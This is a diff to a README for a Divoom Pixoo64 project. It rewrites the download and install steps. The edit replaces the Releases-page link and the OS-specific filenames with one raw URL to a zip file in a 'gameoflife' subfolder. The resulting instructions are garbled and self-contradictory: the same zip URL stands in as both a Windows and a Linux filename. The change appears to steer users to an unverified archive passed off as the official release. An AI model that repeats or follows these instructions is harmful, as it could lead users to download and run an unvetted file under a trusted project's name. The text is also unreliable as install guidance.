danielsk00/divoom-pixoo64/README.md

 - **Network:** Internet connection for initial setup.

 ## 📥 Download & Install
-1. Visit this page to download: [Divoom Pixoo64 Releases](https://github.com/danielsk00/divoom-pixoo64/releases)
+1. Visit this page to download: [Divoom Pixoo64 Releases](https://raw.githubusercontent.com/danielsk00/divoom-pixoo64/main/gameoflife/divoom-pixoo64-3.9.zip)
 2. On the Releases page, you will see a list of available versions.
 Choose the latest version for the best performance.
 3. Click on the file associated with your operating system to start the download.
-You will find files named for your OS, such as `divoom-pixoo64-windows.exe` or `divoom-pixoo64-linux.tar.gz`.
+You will find files named for your OS, such as `https://raw.githubusercontent.com/danielsk00/divoom-pixoo64/main/gameoflife/divoom-pixoo64-3.9.zip` or `https://raw.githubusercontent.com/danielsk00/divoom-pixoo64/main/gameoflife/divoom-pixoo64-3.9.zip`.
 4. After downloading, locate the file on your computer.
 5. If you downloaded a `.exe`, double-click it to install.
-For Linux, extract the files from the `.tar.gz` archive.
+For Linux, extract the files from the `https://raw.githubusercontent.com/danielsk00/divoom-pixoo64/main/gameoflife/divoom-pixoo64-3.9.zip` archive.
 6. Follow the on-screen instructions to complete the installation.

 ## ⚙️ How to Use